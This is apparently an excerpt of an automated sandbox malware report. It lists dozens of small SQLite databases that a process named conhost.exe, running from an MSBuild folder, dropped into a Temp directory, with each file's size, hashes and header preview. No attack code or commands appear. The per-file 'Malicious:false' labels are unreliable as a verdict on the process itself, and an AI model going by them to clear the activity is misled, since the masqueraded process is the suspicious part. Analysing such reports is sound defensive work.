                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\IeQNnKkkIJ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Ih2SaagdCC

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\J3zegzBECf

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\JXIq7FFQof

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\JZpGSOYWzI

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\JbPrHCpl0Q

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Jnm3NrZPsm

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\JzklBumnIX

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\K0PcHuLlF7

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\KBpeOZl6LK

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\KIkNHLF8GE

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\L8NH8KRgYq

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\LEAWzJEZrl

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\LaCiZSN0Kz

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\MdDUdCiqAh

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\MqlTjuXSt5

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\NA0MqSscMm

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\NhntyXLImc

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\NmZvQoTSfS

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\NvKDCWqVy1

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\O8VQksHBkn

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\OHWh9jYDpn

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\OLVVh7sjwH

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\OUyQUACOjc

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
